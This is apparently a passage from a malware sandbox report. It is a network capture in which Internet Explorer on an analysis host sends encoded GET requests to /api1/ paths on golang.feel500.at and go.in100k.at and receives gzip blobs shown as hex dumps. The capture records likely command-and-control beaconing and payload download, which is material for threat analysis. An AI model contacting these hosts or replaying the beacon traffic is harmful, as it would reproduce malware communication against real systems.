7e 13 23 05 a6 b1 e7 7b df 19 75 83 f7 cd 44 1d 69 8c 6f 4d 86 98 99 f5 4c 50 1b 17 64 65 90 9f ea fe 50 0e d9 92 67 6c bf 7a 1e 9b a6 01 b0 92 e6 d7 72 ab 1d 74 6e 70 85 3b e1 fa d8 66 c0 a4 53 4a d8 b2 32 a6 8a c9 5f 1b e1 df 98 43 04 a6 2f b3 aa 2c e8 e7 3e b7 6b 0a 00 37 f3 91 35 e6 09 c0 b9 49 0e 6c 02 0b b9 75 07 e3 54 10 d7 48 76 7f 26 a7 e0 34 ed 74 bd 9f 78 07 f3 01 90 68 7c 1b fb 50 04 3f 4b cb 2e ec dc a8 00 a9 dd d8 74 57 3c 8a 7a 31 bd ed 89 9e a8 97 f6 d9 a0 f2 41 f2 78 db 31 25 fe 12 e2 15 97 2d 30 e8 2d b4 91 23 61 44 37 8a fe ce e3 54 09 4f 34 40 d3 86 de fd 6c 65 67 ee 4f 5e 01 73 85 54 1b 45 c2 62 ac 47 33 d8 de 66 66 2f 28 12 4e 33 6a ef 14 36 8f 75 23 0c e6 0d 34 16 31 df 2f a9 d8 18 8b 4c 7e 17 aa b5 46 bc 72 26 3b 65 e7 f7 99 28 08 f7 e3 42 52 38 19 aa f4 2d e9 d9 26 de c4 7b 18 2b 6b 69 92 95 95 d2 3c e4 74 84 0f 51 d8 9b 95 80 55 57 87 c4 64 50 16 d6 46 99 48 41 32 44 f3 ca 5b cb 95 55 f4 f0 ca 18 cd c7 62 f9 2a 5d 2d ed a5 34 b4 bb b9 42 1d cf a8 b9 38 60 61 4c 3c 46 19 6a df e1 4c 46 b1 d8 cd 6b 49 bf 7b 03 dc c8 b3 97 df dd a6 9a 02 0c 94 4e 4b 84 4c 20 f0 3c 60 f8 1c b8 16 68 4a 36 36 9a 2e 4f b8 65 0a f3 10 7d 6b 50 b3 0f 79 7e a0 ef e2 e2 09 ea 77 2a 7b b2 20 3e d7 7b f6 ef 60 29 1b 93 27 da cd c9 3e b2 c6 cd 31 Data Ascii: 2000rE?nKn;n_tL {_~Oim7=ie13JjE5# M#JQ#8'HUh)Cq#$YklSW$4 =>@/L$t}'zj?u ^<E&x\OL.M+$406:IEU7mxYu=g^[@aRQs{:?\]Dq4uV^Z5u4/W=ik>+t(HHh@[der{Rv%Yl5nerYasP0LS=&J8=tv S4CU#M_&weB{4\7'\|k3D2Se;{Xt_eP,lTYk J<V)s#g{:w"J9xdX9&Hrv+&}PAjQ'~#{uDioMLPdePglzrtnp;fSJ2_C/,>k75IluTHv&4txh\|P?K.tW<z1Ax1%-0-#aD7TO4@legO^sTEbG3ff/(N3j6u#41/L~Fr&;e(BR8-&{+ki<tQUWdPFHA2D[Ub]-4B8`aL<FjLFkI{NKL <`hJ66.Oe}kPy~w{ >{`)'>1
Feb 12, 2021 10:00:42.103524923 CET	6225	IN	Data Raw: 21 e9 96 d6 ef 35 d6 75 51 6b 59 82 2a f7 20 d0 22 b5 c3 23 2f ea 1f 53 99 8c ea 9a e3 42 3f d7 4c 12 35 2f 9c 72 e4 24 01 a5 fa 0e 9f 25 9c a4 53 2c f8 91 dd 9e 12 1f ac f2 52 be a0 3e aa f0 f3 75 b2 40 72 98 b8 f9 ba 58 3e 3f 4e 8b c1 6a 5f 4e Data Ascii: !5uQkY* "#/SB?L5/r$%S,R>u@rX>?Nj_N4)phL1KQ[B1CR4Ht\|>G6_Or`I#Ow{wB2XA_\|jm<?{$\n_"%+=`3302~Q.fUQw<lvB0F{
Feb 12, 2021 10:00:42.103573084 CET	6226	IN	Data Raw: a6 33 b0 eb 4a e0 57 00 d0 5a 26 c9 be ee 69 52 3b 22 bb fe b2 e7 aa 8f 0a 37 d3 38 fb f4 55 b2 92 9a 1c db 9f 75 fc 12 96 b5 f8 8e 73 ed 26 d1 e8 f7 67 92 31 b3 25 bc 75 d8 16 27 81 1a e3 1d 29 25 1c 9f 68 4d 0d d8 26 25 4d e0 81 65 b3 27 c1 69 Data Ascii: 3JWZ&iR;"78Uus&g1%u')%hM&%Me'igR/tL=/z;"#^;YcZhOC"xI/yx$M,-Rb02@Hg4:,}'.>FOdpZk5>X;{@?M+Q?'\|P;s%/zz
Feb 12, 2021 10:00:42.103630066 CET	6228	IN	Data Raw: a4 4f a4 55 7a b7 84 9a 2a ac cd 84 fc 67 ef 29 bf 9c f8 64 08 29 e2 62 fe 5b cf 24 ad 11 a3 19 73 5e fa 61 85 18 1c 9f fa 10 0c 98 d8 2f cb 4d 89 2b 93 d1 50 4e 10 84 16 59 97 c2 b6 2d b5 95 ec b8 02 a2 ae e8 0f 75 8c 1d 9f de 7b 50 ae 87 1a 25 Data Ascii: OUzg)d)b[$s^a/M+PNY-u{P%bS<A,czt54mjM'~HK3 r,SfK85)\|?.2yo28Y[>6d. <O;N[.>f@~bG,w5g'y
Feb 12, 2021 10:00:42.103672028 CET	6229	IN	Data Raw: 26 7e 54 f2 1d b4 59 55 5e 6a 58 fc 88 0e 0d e7 67 a0 3b 77 49 6d e2 11 30 0b 0f c2 6c d1 19 82 62 e2 11 0e 8c cd 02 f4 ca 87 bd 4f f3 9b 77 69 f1 a8 e1 23 72 4e bc a4 48 09 8d 9c 96 92 33 00 da d4 8d 7f 52 e4 57 83 9a 90 fa fc 3a d4 b1 81 0b 7d Data Ascii: &~TYU^jXg;wIm0lbOwi#rNH3RW:}T] f9cbOOw(i%rRdCblIV.kJ:^'F]3?,"*?&>`7LRc1U'^SX@JZ-@M>y4dQ
Feb 12, 2021 10:00:42.103712082 CET	6231	IN	Data Raw: e1 ad 12 e6 c7 b7 f1 3b 0a fc 00 07 df d2 e8 df 96 70 71 50 ad 26 69 fc fc 0c e9 38 ab 61 92 95 ef b7 e9 f8 da 83 08 f3 5e da 46 85 04 d0 b1 5c 09 c3 8e 83 fa 09 b0 41 82 64 65 e7 19 8f f9 b1 8b b5 71 7e 3a 7e 8b b8 d0 c2 3c a2 99 f0 1c bb 47 f6 Data Ascii: ;pqP&i8a^F\Adeq~:~<GNPS5t_xuR8#U?`mbIlI;w_[1x-;EMeDsX<R:9MZbSg7l{j#jxgccu\|Ofjn,*r_Tl4H3 (6YT0z
Feb 12, 2021 10:00:42.143819094 CET	6232	IN	Data Raw: cc de 23 7f 67 19 b6 a2 c3 51 19 eb 99 05 97 1e 7c 29 3c 80 7f 94 09 1d 3d 81 68 d3 4d 0e c5 b4 0f 12 8f 35 fa 55 da b3 2e 90 e5 3e 31 50 dd 60 4a fd 04 1c aa 52 22 f9 fd 58 9b 3a 20 31 78 cf 45 ba 93 c9 0c 85 6d e4 13 54 4a 93 f7 b8 f1 af f9 85 Data Ascii: #gQ\|)<=hM5U.>1P`JR"X: 1xEmTJ:0&5M5cC( t! CB_C~zd?o8PazmKSY5Tn>nsiv?Q!S<OR/U9KO>e1Rm@q(
Feb 12, 2021 10:00:42.143846989 CET	6234	IN	Data Raw: cb 3d 07 f2 98 ae 2f 9a e5 2e 74 d2 5a 66 00 1a 52 83 b9 6a e6 74 c2 04 1d 1b 0a d5 46 10 27 ea 0f d5 7b 52 ab fb 77 4f 7c 69 0a 82 4e 2a 36 45 1a 49 24 c8 73 f1 54 fc 44 98 e5 90 8c 35 42 70 e5 b1 b0 5f 46 fa 45 c4 f2 2d ae 97 df 99 ca eb 2a e7 Data Ascii: =/.tZfRjtF'{RwO\|iN6EI$sTD5Bp_FE-QA]ssq"~<'M[ySE1RfDz~m>/Bdh$512W+83B)dMks7\|"3/EnG\5wm#r"
Feb 12, 2021 10:00:42.143862963 CET	6235	IN	Data Raw: 30 4c 60 b9 0d 66 39 5b 03 db 38 aa d5 fd 32 c8 8f d5 dd 22 3e 03 aa ce 95 df 69 4f 2a ed cc c7 da b0 99 4a 31 09 c2 b7 ba 01 2e 72 99 8b b6 04 f9 01 fb 16 9c 2e 62 2d d5 fe a2 32 f4 88 f8 1b fb e9 6d 62 5f f0 4e 29 f9 07 db 54 87 6c 20 fc 29 a5 Data Ascii: 0L`f9[82">iOJ1.r.b-2mb_N)Tl )yJmfG"S'h4b{Ax>\]]-g:,.hDiqYazUq\MRJ\|8<lH{S\*7hic3LfQMThKfg>l!knOm
Feb 12, 2021 10:00:42.143876076 CET	6236	IN	Data Raw: b9 0f 61 0d 14 ab 9c 06 67 5d ae 80 56 79 cf a2 75 66 39 d7 f3 8b ff c2 0f 55 1b d4 8f 55 4a 80 94 a3 7d fa 16 22 8f 5d 7b d4 28 c7 83 fd bc 92 dd c0 cf 0b 0e 1f 07 46 85 e9 fc d4 ef 34 47 88 fe 38 3a d6 42 5a 62 9c 04 ec 94 7e d1 60 d3 70 db ac Data Ascii: ag]Vyuf9UUJ}"]{(F4G8:BZb~`p\(^N*!INPT,p.o6\|N#'Y3`}{w3J:Ay1>B#j!cm4Y#+P\mlfC)+~,T {Y2
Feb 12, 2021 10:00:42.184185028 CET	6238	IN	Data Raw: 57 8f b6 c8 f1 cb 1b 72 33 6f fb 57 93 7d f3 c7 90 59 b8 05 75 14 00 df 37 6f 35 9d 51 43 2c d0 e5 f6 73 b7 94 bc bc d8 d1 07 3f a1 82 93 9f dd ab ce 5d da dd 83 60 52 6a 9c bf fc f9 3c 62 03 0a a3 6d 88 05 9d cb 97 76 5f 8c 05 55 86 56 6e c4 01 Data Ascii: Wr3oW}Yu7o5QC,s?]`Rj<bmv_UVn`p-D_t[35]5Tg?jn5e2tk%!ndaY$vt:\#&VX-2cE?{acpT59Pp &_x! H>v6!;L2q-vF

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49756	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 10:00:42.564608097 CET	6434	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: golang.feel500.at Connection: Keep-Alive
Feb 12, 2021 10:00:42.652718067 CET	6435	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 12 Feb 2021 09:00:42 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.6	49759	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 10:00:45.383666039 CET	6436	OUT	GET /api1/WpBs3eblZL2bM/eqngm5Qw/I8JSfPJ_2Fa8Gc3pObm8uim/9flcMVIzEU/MRqomoxt8Q2O1JJ03/ZSj1o2HmPZtK/O9QP218enUp/m1K_2FgloiW3rF/oEuojNadbJqe6VOrFglrs/Ndi7e_2Br7N9yDeG/5hb81boaOqEuw3E/kxHEh7CU8L_2FQm9GN/dbnlxd_2B/J8a13_2FHiOHS5rUu68O/mOTX7eo0S_2BSz_2F55/SPIJ116DNn5HQ6QSsDbLuG/U7BuZ1ELETSnp/HKm0Yev_/2BYuFboTfZStfkhwMh7_2Fr/vWxqAs_2B4/ppPPRk2wwNFmF70Ei/cPOuG4TRxPLy6vkSp/GbYUyI HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: go.in100k.at Connection: Keep-Alive
Feb 12, 2021 10:00:45.767699003 CET	6438	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 09:00:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 37 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 15 95 35 a2 ad 08 00 43 17 44 81 5b 31 05 ee ee 74 b8 cb c5 61 f5 ff cd 16 92 9c 93 1c 48 64 20 dd 5e 16 ff a5 a1 4b 30 43 47 aa 7c a6 a7 61 84 d1 3b 34 c5 c4 26 8a 9a 7a ca 2e 6c 58 85 12 8f 42 38 40 9d cf 47 f0 db de a2 cd 77 f5 1d 41 dd 79 48 03 7d 56 34 9b 5f bd 8e ad 0e c0 36 70 45 ef f6 da cc 66 a6 32 f8 4f 33 86 e0 ad 94 08 f6 3a a1 d7 5c aa 32 04 33 60 e2 f8 7d 38 05 ae 61 1b 04 b7 e4 03 0c b3 a6 40 a0 a6 15 20 51 88 65 1e ce 6b 48 8c 77 5d 68 37 ec 7b 43 83 3b 39 b1 89 93 b7 61 94 fe 3a 2a b2 d2 46 71 1c e3 89 11 90 a6 7e ae b3 25 b8 25 4e a0 e4 67 0b 87 19 27 9c ef 22 1d 81 56 ae cf cd ae 65 a6 9a 1d 96 64 7f 74 87 c3 3e 29 03 90 c2 79 cb 13 9b 84 fc 62 33 e0 00 5c 30 a0 58 a9 9b 29 45 e3 22 ec 15 bf 7a e3 70 0d 4d e7 e4 1a 31 4d 39 47 4a 65 05 c1 a0 7d da b3 9d e7 cb cd ca fd c1 af e2 2b eb fd 78 a0 b8 fa 42 17 dc f9 1c 7a a3 71 b0 c3 7a d9 e0 21 06 a4 de 8e a3 e3 c9 99 e6 31 e5 07 6a 5f 3a ee f4 e3 5e 2b ee 31 98 23 f2 13 73 43 32 b1 b5 9e 2c 14 8b d5 21 23 5b a7 9e fd d0 ad 95 7a 7c 57 c4 24 c5 65 18 0d 13 bc 5d eb d4 b2 ea e3 ed 11 5a f1 eb 35 e2 e4 54 6e af df b0 e2 ba b3 25 ed 03 68 65 f2 71 d6 92 ad 4d ca 59 dc 27 59 4a 3f 9b a4 b2 51 7b 91 c4 00 7e 51 77 78 1e c0 33 85 07 b6 2a 84 49 dd cb 3b b9 5e b4 31 b7 44 d9 ae f3 d6 61 32 a0 4d 10 7c 78 e9 87 3e df e4 ca df 14 62 31 3a 5a 79 13 ab 23 37 73 ca 66 7f 8e 87 da c7 6d d9 ac cd b1 84 ba d1 aa 50 03 2c 75 44 15 6d 17 ed 96 08 f9 55 1d 78 54 13 7c c1 98 a9 f0 ec 23 9a ea b0 cf f1 e8 48 12 be 6f 2b 79 93 e1 82 f8 71 41 c5 6c 80 67 3c a9 a7 c9 cd 5f 7c 86 d1 a0 3b bf 43 f3 26 b0 20 6f 68 09 fb 17 16 bb 28 56 97 60 a3 53 2d 8b 1d 78 bf 8a 8d 47 c4 1a bf d9 6d 25 ea b8 bb d8 b3 db 50 52 dd 1b a0 a3 fc 6c a9 b4 03 dd 9c d6 d2 e3 95 70 db e4 bb 76 9c 1d ac bd af 2d 81 e7 9a 8c 18 86 b3 38 da 32 38 ca c1 9e 4c b0 a4 49 70 a1 44 8b dd 5b c1 0a 44 04 c9 87 e5 47 8a 65 9d 9b 42 a4 9d 77 0c bc 88 30 4a 29 24 b3 ff 9d 55 fe c9 c5 18 3a 62 ae cc 1b c8 13 c2 58 06 ed 13 5d 6b 58 45 13 7b 93 30 b3 ef 6f 21 ae 7a ea c2 02 af d0 4e ce f4 da 77 19 92 01 97 2b 95 11 df 33 82 d3 98 d7 1b 15 bb 3a 4f 35 07 0d 61 59 9e 11 7f 63 c2 c8 33 bc ee 4b 2b 7d 35 16 ae e8 98 f8 c8 73 8c 8c 36 4b be 3e 4c b7 bf d5 a4 fa 51 37 ad 2b c6 84 17 32 14 3e 14 09 0a cc 55 5a 9b 5b 87 5f 6f 53 ec cb ff 7c 93 79 8e a8 17 d2 9c 81 a6 14 4e 36 57 7a ad 28 17 54 e3 00 2e 07 98 15 08 7f c4 93 e0 e8 28 2b 83 32 f8 0e 1d cb 11 47 5f 2e e4 9e a8 15 11 94 5c d4 46 2c e9 bf ee 21 33 3a e8 62 59 e3 0c 36 16 13 09 cb 12 c5 05 ab 5d 06 2f 25 8a 26 54 a3 7d 35 e0 92 76 af 00 cb 97 b9 9b a2 39 e5 87 7a 8a 8c e7 b2 d1 a1 f9 78 11 06 19 77 82 79 d7 f8 c0 10 c0 de 51 80 1e 65 4c 35 52 f4 4f ca 34 01 9f 27 d5 e4 e0 e8 af d1 72 8c 20 e6 15 c0 63 e7 a9 14 b2 57 26 92 d8 aa a3 c7 d2 26 0d 1f 9f c9 f4 26 03 63 43 68 d9 26 fb 66 ea 6a 7e 72 f7 c2 e3 44 fb 34 ec ae 68 42 e0 a9 13 af 44 aa d5 22 8e a1 f3 db cc 82 f2 36 91 cc 4b 51 dd fe 23 a0 df 8a d7 93 bc 50 a8 c0 a6 6f 49 49 13 39 79 b0 f2 42 d5 97 f3 51 84 86 ac 10 cf c0 90 b6 16 73 40 a1 ea 02 b9 47 8a b4 58 0f fa 2f b0 d7 68 67 c2 5c de 63 e4 8b 98 28 Data Ascii: 7565CD[1taHd ^K0CG\|a;4&z.lXB8@GwAyH}V4_6pEf2O3:\23`}8a@ QekHw]h7{C;9a:Fq~%%Ng'"Vedt>)yb3\0X)E"zpM1M9GJe}+xBzqz!1j_:^+1#sC2,!#[z\|W$e]Z5Tn%heqMY'YJ?Q{~Qwx3I;^1Da2M\|x>b1:Zy#7sfmP,uDmUxT\|#Ho+yqAlg<_\|;C& oh(V`S-xGm%PRlpv-828LIpD[DGeBw0J)$U:bX]kXE{0o!zNw+3:O5aYc3K+}5s6K>LQ7+2>UZ[_oS\|yN6Wz(T.(+2G_.\F,!3:bY6]/%&T}5v9zxwyQeL5RO4'r cW&&&cCh&fj~rD4hBD"6KQ#PoII9yBQs@GX/hg\c(
Feb 12, 2021 10:00:45.767725945 CET	6439	IN	Data Raw: 25 57 ac c0 ef 4f 05 04 9a 93 1a 53 38 d8 7e 88 55 42 d6 26 c2 21 19 29 d0 18 02 f7 b3 eb c9 34 5f ed cd 82 de 97 53 17 c6 94 9e 79 59 de 1c cc 44 be a4 b9 bb 63 6b fe 20 fa 53 0f ba 1a 26 45 a3 b3 dd b1 4e b4 dc 67 b2 02 0d dc fb 4d 19 48 cb 79 Data Ascii: %WOS8~UB&!)4_SyYDck S&ENgMHy2{"I/]HTk{wbL*\c.:?PyJ&(H~q>gUAnCaGONfV\|YXf]c.4bH:W,~ykl)\|).RKTiUa>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.6	49761	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 10:00:46.048629045 CET	6440	OUT	GET /api1/6DXTv_2FudTfVxedDD3UMQ/xS_2FoOKoiAeF/j0VSQAcL/gS9HWeAk0_2F3Z4xgoE9VU8/6izVNWCf_2/BuY7MmzZCc40Rhjlu/B4FbRUu_2FOa/7V0Ff9EtB1A/GAZdoYUkX2pBQy/DpMAjJMM0d1LaayU4tu_2/Fsf5ndznFCuQrj3e/8VhAjUXdrSXwe0n/HOOcG0t_2FpMgIGwve/oERmGT4tA/XmAqCpIkdN_2FImpVylW/FHybdHaObNxlM3otB6A/Y5ae5imM74agsv2hL9KKKN/UaXEdvmu64Qap/TG_2FQ9U/mG6Y2EiFIZCIHUi9iJIG41z/L0LjQmKgxf/OtAgg8QY5/yM8_2B0 HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: golang.feel500.at Connection: Keep-Alive
Feb 12, 2021 10:00:46.465308905 CET	6442	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 09:00:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9a c5 76 83 50 14 45 3f 88 01 6e 43 82 13 dc 61 86 bb 3b 5f df 74 9a d5 d5 84 fb de 3d 67 ef a6 e0 89 a3 18 7e de 15 4b 53 77 28 ac f0 90 e3 64 61 5d 61 d9 ed d1 f3 09 d5 7e 0e 6b 36 77 f4 f6 83 21 e7 33 dc 70 4c cf d8 ba 49 92 9c 04 11 57 c5 81 34 ac b2 56 6b 38 cd b6 c4 8e b9 ee 46 e4 df 74 8b 98 77 8f 0b e0 c4 5a 9b 6a 7d 9d 7a d0 a0 1c 11 f7 03 75 ad 09 04 36 ac 09 7b 3c 76 2c a6 2b b1 9e 42 dc dd 7a a2 ab 36 88 ec 72 10 e4 4a 20 a8 3e e9 dd c7 85 b9 72 23 dd 03 52 63 af 13 bd e9 42 3d 85 1e f5 65 df 9e 85 dd be fe fd b4 fc c1 bc 62 60 4d 0e 04 0f 8d 18 54 e4 49 30 bb 2e 04 50 1e 4c 30 bc 7f 2f 72 19 ed 04 62 3c de 99 2b 5e 75 6c 7a 7b 02 8d 56 41 7d 34 cc a1 50 02 dc 22 52 d4 fc 5a 33 7f 1f 5c 5f a0 9b 11 30 42 1e 65 68 5e c7 72 3e 49 f1 46 98 4f 51 7d 6b e3 f3 4d f2 79 3c cb a8 46 4c 04 4b f7 1d 0f 88 d5 bb 8d 85 5c 13 50 2c 80 1c 8a e9 4e cf f3 51 5a 81 41 9e b8 b1 63 3c cd 58 b3 be f7 8f 23 aa a2 78 a1 ec 95 f0 34 92 8b 83 85 64 b1 01 ef de df 73 b9 b6 46 69 39 ce c4 91 bf ab ea 58 da 65 de f1 a5 8f 9d 85 f6 45 67 9f 61 93 3a e3 12 a9 b4 8f 7e cf 0a 25 5e 1d 8a f6 ed c4 59 19 32 c4 6e 37 95 26 44 5a 2c cb a9 ce 1b 86 f5 1a a9 c2 89 93 ea 85 48 9d 9b a1 00 f2 53 94 c0 b7 1d ec c0 86 c8 e0 a4 2f 5d c5 73 00 c6 e0 a6 65 a3 a4 d2 0c 09 79 e4 97 e0 8a 60 a6 ca 9a 41 c4 ec ea a1 b3 97 bb 0a 98 cb 4b c1 a6 9e 5a a8 06 3a fa 4a 3c 03 a6 c7 f1 83 64 06 96 77 58 6e f9 b4 22 b7 5c 6b e9 6f df b8 ed b6 e9 5b 10 b3 7b 7d 14 fb 73 57 dd 6c 91 8e 42 ce 50 d8 70 f2 12 99 3c 07 55 c6 ad 9e e9 2e a0 78 af cd c4 b7 6c af 64 c6 d0 ed b9 ca b3 a0 c8 1c ac 4c 04 3e 66 bc 29 a9 cc 19 64 94 60 c5 db ee 43 fb 6b cb ca 4b dc ca 36 4b b7 58 96 fe 80 fa 16 e9 4d b6 be 4a 2a d3 02 55 ee db f3 f1 f9 d0 57 e2 18 d8 41 14 ac 71 ba 1d 99 bd b6 20 aa 5c 89 27 c7 48 b8 8d d6 92 81 45 37 b0 10 8e e1 ec 69 c8 61 d6 20 b0 81 ae c9 80 03 f6 92 fa e1 26 cf 6e b7 71 0c 3a 0c c8 1c 77 c9 e9 c1 48 a3 84 fa 15 02 48 23 29 a4 07 c7 eb 0c d6 91 1e 7a 14 d8 b2 6f 10 e7 f8 4b 2e b2 ac 8f 28 d6 1f f5 c7 b1 a2 33 a3 2a c4 9d 45 ef fb 25 d2 5b 7c 7c ba 92 91 11 01 9c 7c 70 d5 85 1c 83 10 21 c1 23 30 b0 ef cb 13 d0 68 52 49 c1 95 6c 6d 89 38 90 85 f5 cb 89 f4 50 3b f7 e9 61 81 f3 ba fd 17 86 01 a6 a6 14 79 5f f7 1d 5c 46 b1 75 ce c2 50 5d 08 10 4f 35 95 f6 ee 86 7a 88 1d f7 2c dd e2 c9 48 19 83 77 c1 62 20 6a c3 1e 5e 05 4b 9f a2 1d 34 de 60 d8 c5 ee 5b 8a 82 c6 14 0e 65 16 ba 39 a2 13 9c a8 69 87 dd ad e7 27 ea ea bb 51 1d 6f df f6 e6 10 ae 88 44 42 53 e2 f5 09 ae f3 e8 18 8c 4e 3e 2d 98 1e dd fa 3b e9 66 53 a5 28 c2 0d db 04 84 07 6a 22 be ec 88 a2 8e 7b 41 da 39 9b 53 5b 08 70 51 9c e0 1d 62 56 22 55 0a be 21 4d b3 a8 a7 a8 9c ab 5c c2 a4 09 2a 16 2f 0c 79 c7 43 22 75 7a 2b 18 24 14 7e 18 12 6f d7 24 6f 2e 17 9b d7 96 3d 80 1a 96 dd 84 77 d7 6d 4a f6 2d ee 47 85 30 70 19 7b 80 b0 66 72 4b f5 7c 76 93 c6 d6 e6 b8 d4 aa 97 d0 1c 82 d3 23 2c 6b 78 96 8a 04 fb 08 60 52 49 89 cc 26 2b 16 e3 ad 19 fc 09 37 bb da 23 d3 ee 08 28 f9 48 a1 05 9f 6c ea 00 12 cf b2 82 2f 24 d3 bc a2 19 03 2b 8a 57 e1 f7 44 97 d8 7e b9 b2 c4 cb 2a 83 9f 4a 1d 66 df c5 4d Data Ascii: 2000vPE?nCa;_t=g~KSw(da]a~k6w!3pLIW4Vk8FtwZj}zu6{<v,+Bz6rJ >r#RcB=eb`MTI0.PL0/rb<+^ulz{VA}4P"RZ3\_0Beh^r>IFOQ}kMy<FLK\P,NQZAc<X#x4dsFi9XeEga:~%^Y2n7&DZ,HS/]sey`AKZ:J<dwXn"\ko[{}sWlBPp<U.xldL>f)d`CkK6KXMJUWAq \'HE7ia &nq:wHH#)zoK.(3E%[\|\|\|p!#0hRIlm8P;ay_\FuP]O5z,Hwb j^K4`[e9i'QoDBSN>-;fS(j"{A9S[pQbV"U!M\/yC"uz+$~o$o.=wmJ-G0p{frK\|v#,kx`RI&+7#(Hl/$+WD~JfM
Feb 12, 2021 10:00:46.465334892 CET	6443	IN	Data Raw: 2a 7b cf 53 2b 0a 3e c8 f6 b1 8d c4 4f 07 ea 26 ca 9a e0 82 f7 d9 20 b7 47 51 76 75 41 5c f6 a8 32 8c 42 77 56 17 7f 32 b6 0c ee ba 66 a0 d9 0a 0b 85 69 c5 db 2e da d5 26 40 58 af 68 f2 ea c2 50 11 69 f0 2e 23 80 14 01 6a 41 1e 49 c3 7e 5a ad f9 Data Ascii: *{S+>O& GQvuA\2BwV2fi.&@XhPi.#jAI~Z;8X,HFOYC(j2#KyjZGmfRSHB?4z= fPPO}#5f;V7\|`L76{E=xtT~d5!KNeR
Feb 12, 2021 10:00:46.465353012 CET	6445	IN	Data Raw: 05 d4 9b e4 ae 4f 75 ee fd 22 1e 79 9d e2 34 e3 18 c3 e7 73 97 80 fe c1 0b 78 95 55 75 01 1a d4 98 0a 86 36 89 47 26 6e 2b b7 93 17 59 77 73 0d 34 54 a4 de 5f 26 1b 2c 8f fb 13 60 91 9c 98 cd b9 b7 d2 42 df e5 b9 e1 41 63 a4 9c 43 02 da 41 74 22 Data Ascii: Ou"y4sxUu6G&n+Yws4T_&,`BAcCAt"7JY-?e]TQ}fKkH2)hd;/AM)_YYnO47>f.}`&aJXo;o) NuYVF-FT<,M
Feb 12, 2021 10:00:46.465377092 CET	6446	IN	Data Raw: 51 d0 ce d4 3b 0d 4b 35 3e 94 bc b9 f3 0b 1b 6f 83 d4 ac 92 2b f0 2a e9 9b 24 b3 c6 21 45 4a 41 00 aa 68 c6 0a 52 94 00 83 d3 63 dc 46 b6 68 19 f7 93 65 38 3d 24 9d f0 76 9b f2 6b c7 e9 3f 0b 84 bb 1a 57 09 7c 74 2f 5f 22 18 39 ba ca e3 a9 49 2b Data Ascii: Q;K5>o+*$!EJAhRcFhe8=$vk?W\|t/_"9I+\|dS0cLB-\|;b'-6`5e\|e#36WRHiS@877\|clXwaDF~82)-b6!Z@Y)9"2"/idjbq"6?2
Feb 12, 2021 10:00:46.465420961 CET	6448	IN	Data Raw: 92 0a 0f a1 2a 20 7c 58 e2 33 2c 0e 33 b1 57 73 6f 00 10 ad 1f 15 86 11 38 b9 ca f1 88 68 a0 b1 67 1f 60 a7 12 c4 bf 1f 63 d3 01 0e 6b 7d 7c a4 70 db 31 2d 4d d6 73 ff 8d d1 4c d5 09 c2 c6 1a df 1e c1 e9 48 30 7c 55 97 a5 7a 9e 90 9f 7d 81 02 33 Data Ascii: * \|X3,3Wso8hg`ck}\|p1-MsLH0\|Uz}3\|8[,o&$F\|tR~KY}6X?_~f9:}\-D0hm}bavycF\|&n+"3er q[e-6tdz~,A;?^O6bA&X
Feb 12, 2021 10:00:46.465445995 CET	6449	IN	Data Raw: bf 8b 24 f7 58 55 dd bf 4c 90 2c 65 0a 23 9a f2 33 10 84 47 f3 32 3d 7b d6 44 a1 af a6 cc a9 86 28 9c 58 04 f3 66 17 db c2 8c 6b 90 25 82 c0 bd 3a 1c bf f2 f7 12 81 1b 12 6e 91 ab d4 a5 20 c7 21 eb 5e 27 c4 5d d4 d0 53 6a ef 3a 6e 66 c7 b3 e6 dc Data Ascii: $XUL,e#3G2={D(Xfk%:n !^']Sj:nf2a,$Ssk&f@_H7kk'4@gvDoo*h`Mj7o0kA%@aODCi'YR!2vIr'Z%wpo\uM
